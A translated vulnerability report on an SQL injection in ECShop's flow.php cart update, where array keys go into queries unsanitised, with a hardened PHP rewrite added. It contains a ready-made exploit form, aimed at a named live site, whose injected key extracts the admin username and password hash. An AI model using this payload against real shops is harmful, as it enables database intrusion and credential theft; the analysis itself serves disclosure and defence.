Ecshop has numerous SQL injection vulnerabilities -- flow.php

From: http://www.wooyun.org/bugs/wooyun-2012-011066

Detailed description:

flow.php
[php]
elseif ($_REQUEST['step'] == 'update_cart')
{
    if (isset($_POST['goods_number']) && is_array($_POST['goods_number']))
    {
        flow_update_cart($_POST['goods_number']);
    }
    show_message($_LANG['update_cart_notice'], $_LANG['back_to_cart'], 'flow.php');
    exit;
}
[/php]

[php]
function flow_update_cart($arr)
{
    /* process each entry */
    foreach ($arr AS $key => $val)
    {
        $val = intval(make_semiangle($val));
        if ($val <= 0 && !is_numeric($key))
        {
            continue;
        }
        // query:
        $sql = "SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code` FROM" . $GLOBALS['ecs']->table('cart') .
               " WHERE rec_id='$key' AND session_id='" . SESS_ID . "'";
        $goods = $GLOBALS['db']->getRow($sql);

        $sql = "SELECT g.goods_name, g.goods_number " .
               "FROM " . $GLOBALS['ecs']->table('goods') . " AS g, " .
               $GLOBALS['ecs']->table('cart') . " AS c " .
               "WHERE g.goods_id = c.goods_id AND c.rec_id = '$key'";
        $row = $GLOBALS['db']->getRow($sql);
        // query: stock tracking is enabled, check that the submitted quantity is valid
        if (intval($GLOBALS['_CFG']['use_storage']) > 0 && $goods['extension_code'] != 'package_buy')
        {
            if ($row['goods_number'] < $val)
            {
                show_message(sprintf($GLOBALS['_LANG']['stock_insufficiency'], $row['goods_name'],
                    $row['goods_number'], $row['goods_number']));
                exit;
            }
            /* it is a product */
            $goods['product_id'] = trim($goods['product_id']);
            if (!empty($goods['product_id']))
            {
                // ... (the rest of the function is not included in the report)
[/php]
Only the array values are sanitized (the global filtering and intval() apply to $val); the array keys are never processed, and $key is interpolated straight into the rec_id condition of both queries. That is the vulnerability.

[php]
<form name="myform" method="post" action="http://yezi.us/flow.php?step=update_cart" enctype="multipart/form-data">
    <input type="text" name="goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1]" value="21aaa">
    <input type="submit" value="Do it"><br>
    Ecshop SQL Injection Exp [4 Fucker Team]
</form>
[/php]
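The key-handling defect and a hardened version, as an added example (not ECShop's own code). vulnerable_filter() reproduces the check from flow_update_cart() above; hardened_filter() and lookup_cart_row() are assumed replacements, using PDO with an in-memory SQLite table in place of ECShop's db wrapper, and make_semiangle() is omitted.

```php
<?php
// Added example, not ECShop's own code: models the flow_update_cart() key
// handling where goods_number[<rec_id>] => <quantity> arrives via $_POST.
// Original logic: the value is cast with intval(), but the key is only
// skipped when the quantity is ALSO <= 0, so a non-numeric key paired with
// a positive quantity survives and is interpolated into WHERE rec_id='$key'.
function vulnerable_filter(array $arr): array
{
    $kept = [];
    foreach ($arr as $key => $val) {
        $val = intval($val);                  // '21aaa' becomes 21, which is > 0
        if ($val <= 0 && !is_numeric($key)) {
            continue;
        }
        $kept[$key] = $val;                   // $key still carries raw text
    }
    return $kept;
}
// Hardened logic: rec_id must be a positive integer regardless of quantity.
function hardened_filter(array $arr): array
{
    $kept = [];
    foreach ($arr as $key => $val) {
        $recId = filter_var($key, FILTER_VALIDATE_INT);
        $qty   = filter_var($val, FILTER_VALIDATE_INT);
        if ($recId === false || $recId <= 0 || $qty === false || $qty <= 0) {
            continue;
        }
        $kept[$recId] = $qty;
    }
    return $kept;
}
// Second layer: bind rec_id as a parameter instead of building the SQL string.
// Table name and columns are assumed; ecs_cart stands in for ECShop's cart table.
function lookup_cart_row(PDO $db, int $recId, string $sessionId): ?array
{
    $stmt = $db->prepare('SELECT goods_id, product_id FROM ecs_cart WHERE rec_id = :rec_id AND session_id = :sid');
    $stmt->execute([':rec_id' => $recId, ':sid' => $sessionId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
// Constructed input: one legitimate entry and one injection-shaped key.
$posted = [7 => '2', "-1' OR '1'='1" => '21aaa'];
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ecs_cart (rec_id INTEGER, session_id TEXT, goods_id INTEGER, product_id TEXT)');
$db->exec("INSERT INTO ecs_cart VALUES (7, 'sess-abc', 100, '')");
var_dump(array_keys(vulnerable_filter($posted)));  // both keys survive
var_dump(array_keys(hardened_filter($posted)));    // only 7 survives
foreach (hardened_filter($posted) as $recId => $qty) {
    var_dump(lookup_cart_row($db, $recId, 'sess-abc'));
}
```

The contrast shows why the PoC value "21aaa" matters: intval() turns it into a positive quantity, so the original `&&` check never reaches the non-numeric key.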

One frustrating, blood-spitting thing~

It turns out Xiaoming had already nailed this hole back in 2010:

http://www.myhack58.com/Article/html/3/62/2010/26956.htm
